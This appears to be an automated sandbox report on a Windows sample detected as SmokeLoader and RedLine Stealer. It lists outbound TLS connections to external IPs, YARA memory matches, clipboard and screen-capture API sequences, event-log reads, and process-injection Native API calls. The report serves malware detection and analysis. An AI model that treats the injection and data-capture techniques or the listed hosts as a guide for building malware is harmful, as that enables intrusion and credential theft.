Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51888 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51889 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51890 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51891 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51892 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51893 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51894 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51896 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51897 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51898 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51899 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51900 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51902 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51903 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51904 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51905 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51906 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51907 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51909 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51910 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51911 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51912 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51913 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51915 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51916 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51917 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51918 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51920 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51921 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51922 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51923 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51924 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51926 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51927 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51928 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected SmokeLoader

Source: Yara match	File source: 00000007.00000002.2706568336.0000000002600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2333549678.00000000040C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2706624835.0000000002621000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2096191047.0000000004090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2096228733.00000000040B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2333340256.00000000025F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 14_2_004EED00 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

14_2_004EED00

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 14_2_004EED00 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

14_2_004EED00

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 14_2_004EFB2F GetDC,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,

14_2_004EFB2F

Spam, unwanted Advertisements and Ransom Demands

Reads the Security eventlog

Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior

Reads the System eventlog

Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShell	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000004.00000002.2333466076.000000000263D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000007.00000002.2706568336.0000000002600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000007.00000002.2706511521.00000000025E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000004.00000002.2333549678.00000000040C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000007.00000002.2706710751.0000000002660000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000007.00000002.2706624835.0000000002621000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.2096191047.0000000004090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.2095808025.0000000002550000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000004.00000002.2333318255.00000000025E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.2096228733.00000000040B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000004.00000002.2333340256.00000000025F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.2096146126.000000000270D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown

Found suspicious ZIP file

Source: venom.zip.15.dr

Zip Entry: runvm.bat

Source: C:\Windows\explorer.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00401513 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401513
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00402FD3 RtlCreateUserThread,NtTerminateProcess,	0_2_00402FD3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00403149 RtlCreateUserThread,NtTerminateProcess,	0_2_00403149
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00401553 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401553
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040267C NtEnumerateKey,	0_2_0040267C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00403303 NtTerminateProcess,GetModuleHandleA,NtMapViewOfSection,NtDuplicateObject,NtQuerySystemInformation,NtOpenKey,NtQueryKey,NtEnumerateKey,RtlCreateUserThread,strstr,tolower,towlower,	0_2_00403303
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040151E NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_0040151E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004020C4 LocalAlloc,NtQuerySystemInformation,	0_2_004020C4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004026DC NtClose,	0_2_004026DC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004025DD NtOpenKey,	0_2_004025DD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004020E3 LocalAlloc,NtQuerySystemInformation,	0_2_004020E3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004020E7 EntryPoint,LocalAlloc,NtQuerySystemInformation,	0_2_004020E7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004020FC LocalAlloc,NtQuerySystemInformation,	0_2_004020FC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00402285 NtQuerySystemInformation,	0_2_00402285
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004020B6 LocalAlloc,NtQuerySystemInformation,	0_2_004020B6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004020B8 LocalAlloc,NtQuerySystemInformation,	0_2_004020B8
Source: C:\Users\user\AppData\Roaming\sashibt	Code function: 4_2_00401513 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_00401513
Source: C:\Users\user\AppData\Roaming\sashibt	Code function: 4_2_00402FD3 RtlCreateUserThread,NtTerminateProcess,	4_2_00402FD3
Source: C:\Users\user\AppData\Roaming\sashibt	Code function: 4_2_00403149 RtlCreateUserThread,NtTerminateProcess,	4_2_00403149
Source: C:\Users\user\AppData\Roaming\sashibt	Code function: 4_2_00401553 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_00401553
Source: C:\Users\user\AppData\Roaming\sashibt	Code function: 4_2_0040267C NtEnumerateKey,	4_2_0040267C
Source: C:\Users\user\AppData\Roaming\sashibt	Code function: 4_2_00403303 NtTerminateProcess,GetModuleHandleA,	4_2_00403303
Source: C:\Users\user\AppData\Roaming\sashibt	Code function: 4_2_0040151E NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_0040151E
Source: C:\Users\user\AppData\Roaming\sashibt	Code function: 4_2_004020C4 LocalAlloc,NtQuerySystemInformation,	4_2_004020C4
Source: C:\Users\user\AppData\Roaming\sashibt	Code function: 4_2_004026DC NtClose,	4_2_004026DC
Source: C:\Users\user\AppData\Roaming\sashibt	Code function: 4_2_004025DD NtOpenKey,	4_2_004025DD
Source: C:\Users\user\AppData\Roaming\sashibt	Code function: 4_2_004020E3 LocalAlloc,NtQuerySystemInformation,	4_2_004020E3
Source: C:\Users\user\AppData\Roaming\sashibt	Code function: 4_2_004020E7 EntryPoint,LocalAlloc,NtQuerySystemInformation,	4_2_004020E7
Source: C:\Users\user\AppData\Roaming\sashibt	Code function: 4_2_004020FC LocalAlloc,NtQuerySystemInformation,	4_2_004020FC
Source: C:\Users\user\AppData\Roaming\sashibt	Code function: 4_2_00402285 NtQuerySystemInformation,	4_2_00402285
Source: C:\Users\user\AppData\Roaming\sashibt	Code function: 4_2_004020B6 LocalAlloc,NtQuerySystemInformation,	4_2_004020B6
Source: C:\Users\user\AppData\Roaming\sashibt	Code function: 4_2_004020B8 LocalAlloc,NtQuerySystemInformation,	4_2_004020B8
Source: C:\Users\user\AppData\Roaming\sashibt	Code function: 7_2_00401513 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	7_2_00401513
Source: C:\Users\user\AppData\Roaming\sashibt	Code function: 7_2_00402FD3 RtlCreateUserThread,NtTerminateProcess,	7_2_00402FD3
Source: C:\Users\user\AppData\Roaming\sashibt	Code function: 7_2_00403149 RtlCreateUserThread,NtTerminateProcess,	7_2_00403149
Source: C:\Users\user\AppData\Roaming\sashibt	Code function: 7_2_00401553 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	7_2_00401553
Source: C:\Users\user\AppData\Roaming\sashibt	Code function: 7_2_0040267C NtEnumerateKey,	7_2_0040267C
Source: C:\Users\user\AppData\Roaming\sashibt	Code function: 7_2_00403303 NtTerminateProcess,GetModuleHandleA,	7_2_00403303
Source: C:\Users\user\AppData\Roaming\sashibt	Code function: 7_2_0040151E NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	7_2_0040151E
Source: C:\Users\user\AppData\Roaming\sashibt	Code function: 7_2_004020C4 LocalAlloc,NtQuerySystemInformation,	7_2_004020C4
Source: C:\Users\user\AppData\Roaming\sashibt	Code function: 7_2_004026DC NtClose,	7_2_004026DC
Source: C:\Users\user\AppData\Roaming\sashibt	Code function: 7_2_004025DD NtOpenKey,	7_2_004025DD
Source: C:\Users\user\AppData\Roaming\sashibt	Code function: 7_2_004020E3 LocalAlloc,NtQuerySystemInformation,	7_2_004020E3
Source: C:\Users\user\AppData\Roaming\sashibt	Code function: 7_2_004020E7 EntryPoint,LocalAlloc,NtQuerySystemInformation,	7_2_004020E7
Source: C:\Users\user\AppData\Roaming\sashibt	Code function: 7_2_004020FC LocalAlloc,NtQuerySystemInformation,	7_2_004020FC
Source: C:\Users\user\AppData\Roaming\sashibt	Code function: 7_2_00402285 NtQuerySystemInformation,	7_2_00402285
Source: C:\Users\user\AppData\Roaming\sashibt	Code function: 7_2_004020B6 LocalAlloc,NtQuerySystemInformation,	7_2_004020B6
Source: C:\Users\user\AppData\Roaming\sashibt	Code function: 7_2_004020B8 LocalAlloc,NtQuerySystemInformation,	7_2_004020B8
Source: C:\Users\user\AppData\Local\Temp\3530.exe	Code function: 8_2_00007FF7A09D6900 RtlAllocateHeap,RtlAllocateHeap,NtQuerySystemInformation,	8_2_00007FF7A09D6900
Source: C:\Users\user\AppData\Local\Temp\3530.exe	Code function: 8_2_00007FF7A09F4FC0 NtReadVirtualMemory,	8_2_00007FF7A09F4FC0
Source: C:\Users\user\AppData\Local\Temp\3530.exe	Code function: 8_2_00007FF7A09F59D0 NtProtectVirtualMemory,	8_2_00007FF7A09F59D0
Source: C:\Users\user\AppData\Local\Temp\3530.exe	Code function: 8_2_00007FF7A09F3F30 NtQueryInformationProcess,	8_2_00007FF7A09F3F30
Source: C:\Users\user\AppData\Local\Temp\3530.exe	Code function: 8_2_00007FF7A09F5100 NtWriteVirtualMemory,	8_2_00007FF7A09F5100
Source: C:\Users\user\AppData\Local\Temp\3530.exe	Code function: 8_2_00007FF7A09F5260 NtAllocateVirtualMemory,	8_2_00007FF7A09F5260

Source: C:\Users\user\AppData\Local\Temp\3530.exe	Code function: 8_2_00007FF7A09AE810	8_2_00007FF7A09AE810
Source: C:\Users\user\AppData\Local\Temp\3530.exe	Code function: 8_2_00007FF7A09D57C0	8_2_00007FF7A09D57C0
Source: C:\Users\user\AppData\Local\Temp\3530.exe	Code function: 8_2_00007FF7A0A0DFD0	8_2_00007FF7A0A0DFD0
Source: C:\Users\user\AppData\Local\Temp\3530.exe	Code function: 8_2_00007FF7A09BA9D0	8_2_00007FF7A09BA9D0
Source: C:\Users\user\AppData\Local\Temp\3530.exe	Code function: 8_2_00007FF7A09AD7A0	8_2_00007FF7A09AD7A0
Source: C:\Users\user\AppData\Local\Temp\3530.exe	Code function: 8_2_00007FF7A09D43B0	8_2_00007FF7A09D43B0
Source: C:\Users\user\AppData\Local\Temp\3530.exe	Code function: 8_2_00007FF7A099C400	8_2_00007FF7A099C400
Source: C:\Users\user\AppData\Local\Temp\3530.exe	Code function: 8_2_00007FF7A09A7000	8_2_00007FF7A09A7000
Source: C:\Users\user\AppData\Local\Temp\3530.exe	Code function: 8_2_00007FF7A099BC00	8_2_00007FF7A099BC00
Source: C:\Users\user\AppData\Local\Temp\3530.exe	Code function: 8_2_00007FF7A09B4E00	8_2_00007FF7A09B4E00
Source: C:\Users\user\AppData\Local\Temp\3530.exe	Code function: 8_2_00007FF7A09BFC10	8_2_00007FF7A09BFC10
Source: C:\Users\user\AppData\Local\Temp\3530.exe	Code function: 8_2_00007FF7A0A04E10	8_2_00007FF7A0A04E10
Source: C:\Users\user\AppData\Local\Temp\3530.exe	Code function: 8_2_00007FF7A09F2010	8_2_00007FF7A09F2010
Source: C:\Users\user\AppData\Local\Temp\3530.exe	Code function: 8_2_00007FF7A09E8C10	8_2_00007FF7A09E8C10
Source: C:\Users\user\AppData\Local\Temp\3530.exe	Code function: 8_2_00007FF7A09C29E0	8_2_00007FF7A09C29E0
Source: C:\Users\user\AppData\Local\Temp\3530.exe	Code function: 8_2_00007FF7A09D6DE0	8_2_00007FF7A09D6DE0
Source: C:\Users\user\AppData\Local\Temp\3530.exe	Code function: 8_2_00007FF7A0A149F0	8_2_00007FF7A0A149F0
Source: C:\Users\user\AppData\Local\Temp\3530.exe	Code function: 8_2_00007FF7A09A4BF0	8_2_00007FF7A09A4BF0
Source: C:\Users\user\AppData\Local\Temp\3530.exe	Code function: 8_2_00007FF7A09ACFF0	8_2_00007FF7A09ACFF0
Source: C:\Users\user\AppData\Local\Temp\3530.exe	Code function: 8_2_00007FF7A09E6DF0	8_2_00007FF7A09E6DF0
Source: C:\Users\user\AppData\Local\Temp\3530.exe	Code function: 8_2_00007FF7A09E11F0	8_2_00007FF7A09E11F0
Source: C:\Users\user\AppData\Local\Temp\3530.exe	Code function: 8_2_00007FF7A09C0740	8_2_00007FF7A09C0740
Source: C:\Users\user\AppData\Local\Temp\3530.exe	Code function: 8_2_00007FF7A0A05D40	8_2_00007FF7A0A05D40
Source: C:\Users\user\AppData\Local\Temp\3530.exe	Code function: 8_2_00007FF7A09D9550	8_2_00007FF7A09D9550
Source: C:\Users\user\AppData\Local\Temp\3530.exe	Code function: 8_2_00007FF7A09D3150	8_2_00007FF7A09D3150
Source: C:\Users\user\AppData\Local\Temp\3530.exe	Code function: 8_2_00007FF7A09A1920	8_2_00007FF7A09A1920
Source: C:\Users\user\AppData\Local\Temp\3530.exe	Code function: 8_2_00007FF7A0A13F20	8_2_00007FF7A0A13F20
Source: C:\Users\user\AppData\Local\Temp\3530.exe	Code function: 8_2_00007FF7A09F5B80	8_2_00007FF7A09F5B80
Source: C:\Users\user\AppData\Local\Temp\3530.exe	Code function: 8_2_00007FF7A09BD390	8_2_00007FF7A09BD390
Source: C:\Users\user\AppData\Local\Temp\3530.exe	Code function: 8_2_00007FF7A09F898B	8_2_00007FF7A09F898B
Source: C:\Users\user\AppData\Local\Temp\3530.exe	Code function: 8_2_00007FF7A09E7D60	8_2_00007FF7A09E7D60
Source: C:\Users\user\AppData\Local\Temp\3530.exe	Code function: 8_2_00007FF7A0A16B70	8_2_00007FF7A0A16B70
Source: C:\Users\user\AppData\Local\Temp\3530.exe	Code function: 8_2_00007FF7A099FB70	8_2_00007FF7A099FB70
Source: C:\Users\user\AppData\Local\Temp\3530.exe	Code function: 8_2_00007FF7A09F4370	8_2_00007FF7A09F4370
Source: C:\Users\user\AppData\Local\Temp\3530.exe	Code function: 8_2_00007FF7A09EF370	8_2_00007FF7A09EF370
Source: C:\Users\user\AppData\Local\Temp\3530.exe	Code function: 8_2_00007FF7A09A5ED0	8_2_00007FF7A09A5ED0
Source: C:\Users\user\AppData\Local\Temp\3530.exe	Code function: 8_2_00007FF7A09B3AD0	8_2_00007FF7A09B3AD0
Source: C:\Users\user\AppData\Local\Temp\3530.exe	Code function: 8_2_00007FF7A0995AD4	8_2_00007FF7A0995AD4
Source: C:\Users\user\AppData\Local\Temp\3530.exe	Code function: 8_2_00007FF7A09D04D0	8_2_00007FF7A09D04D0
Source: C:\Users\user\AppData\Local\Temp\3530.exe	Code function: 8_2_00007FF7A0A116C0	8_2_00007FF7A0A116C0
Source: C:\Users\user\AppData\Local\Temp\3530.exe	Code function: 8_2_00007FF7A09964A0	8_2_00007FF7A09964A0
Source: C:\Users\user\AppData\Local\Temp\3530.exe	Code function: 8_2_00007FF7A09BB6A0	8_2_00007FF7A09BB6A0
Source: C:\Users\user\AppData\Local\Temp\3530.exe	Code function: 8_2_00007FF7A0A18AB0	8_2_00007FF7A0A18AB0
Source: C:\Users\user\AppData\Local\Temp\3530.exe	Code function: 8_2_00007FF7A09ABAB0	8_2_00007FF7A09ABAB0
Source: C:\Users\user\AppData\Local\Temp\3530.exe	Code function: 8_2_00007FF7A09DB6B0	8_2_00007FF7A09DB6B0
Source: C:\Users\user\AppData\Local\Temp\3530.exe	Code function: 8_2_00007FF7A09F1700	8_2_00007FF7A09F1700
Source: C:\Users\user\AppData\Local\Temp\3530.exe	Code function: 8_2_00007FF7A09A5910	8_2_00007FF7A09A5910
Source: C:\Users\user\AppData\Local\Temp\3530.exe	Code function: 8_2_00007FF7A09D1510	8_2_00007FF7A09D1510
Source: C:\Users\user\AppData\Local\Temp\3530.exe	Code function: 8_2_00007FF7A099A0F0	8_2_00007FF7A099A0F0
Source: C:\Users\user\AppData\Local\Temp\3530.exe	Code function: 8_2_00007FF7A09ECC40	8_2_00007FF7A09ECC40
Source: C:\Users\user\AppData\Local\Temp\3530.exe	Code function: 8_2_00007FF7A09A0050	8_2_00007FF7A09A0050
Source: C:\Users\user\AppData\Local\Temp\3530.exe	Code function: 8_2_00007FF7A0991450	8_2_00007FF7A0991450
Source: C:\Users\user\AppData\Local\Temp\3530.exe	Code function: 8_2_00007FF7A09EB020	8_2_00007FF7A09EB020
Source: C:\Users\user\AppData\Local\Temp\3530.exe	Code function: 8_2_00007FF7A0A0C230	8_2_00007FF7A0A0C230
Source: C:\Users\user\AppData\Local\Temp\3530.exe	Code function: 8_2_00007FF7A09A3E30	8_2_00007FF7A09A3E30
Source: C:\Users\user\AppData\Local\Temp\3530.exe	Code function: 8_2_00007FF7A09C9830	8_2_00007FF7A09C9830
Source: C:\Users\user\AppData\Local\Temp\3530.exe	Code function: 8_2_00007FF7A09EE430	8_2_00007FF7A09EE430
Source: C:\Users\user\AppData\Local\Temp\3530.exe	Code function: 8_2_00007FF7A09C1880	8_2_00007FF7A09C1880
Source: C:\Users\user\AppData\Local\Temp\3530.exe	Code function: 8_2_00007FF7A09E3E80	8_2_00007FF7A09E3E80
Source: C:\Users\user\AppData\Local\Temp\3530.exe	Code function: 8_2_00007FF7A09E2080	8_2_00007FF7A09E2080
Source: C:\Users\user\AppData\Local\Temp\3530.exe	Code function: 8_2_00007FF7A09E5860	8_2_00007FF7A09E5860
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Code function: 11_2_00007FF848F24196	11_2_00007FF848F24196
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Code function: 11_2_00007FF848F22C0A	11_2_00007FF848F22C0A
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Code function: 11_2_00007FF848F23430	11_2_00007FF848F23430
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Code function: 11_2_00007FF848F23D10	11_2_00007FF848F23D10
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Code function: 11_2_00007FF848F24752	11_2_00007FF848F24752
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Code function: 11_2_00007FF848F308C8	11_2_00007FF848F308C8
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Code function: 11_2_00007FF848F2D6FB	11_2_00007FF848F2D6FB
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Code function: 11_2_00007FF848F30F0D	11_2_00007FF848F30F0D
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Code function: 13_2_00007FF848F13420	13_2_00007FF848F13420
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Code function: 13_2_00007FF848F13C8C	13_2_00007FF848F13C8C
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Code function: 13_2_00007FF848F14742	13_2_00007FF848F14742
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Code function: 13_2_00007FF848F14186	13_2_00007FF848F14186
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Code function: 13_2_00007FF848F151B8	13_2_00007FF848F151B8
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 14_2_004D7189	14_2_004D7189
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 14_2_004D72DD	14_2_004D72DD
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 14_2_004C52E0	14_2_004C52E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 14_2_004E2290	14_2_004E2290
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 14_2_004E1B52	14_2_004E1B52
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 14_2_004D1B25	14_2_004D1B25
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 14_2_004DEC40	14_2_004DEC40
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 14_2_004F3CD0	14_2_004F3CD0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 14_2_004FCD40	14_2_004FCD40
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 14_2_004E6F80	14_2_004E6F80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 14_2_004FB840	14_2_004FB840
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 14_2_004FD010	14_2_004FD010
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 14_2_004DE086	14_2_004DE086
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 14_2_004F8880	14_2_004F8880
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 14_2_004E6890	14_2_004E6890
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 14_2_004E6F80	14_2_004E6F80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 14_2_004C8960	14_2_004C8960
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 14_2_004FB160	14_2_004FB160
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 14_2_004C4900	14_2_004C4900
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 14_2_004E29C9	14_2_004E29C9
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 14_2_004FA9E4	14_2_004FA9E4
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 14_2_004E41A0	14_2_004E41A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 14_2_004CC270	14_2_004CC270
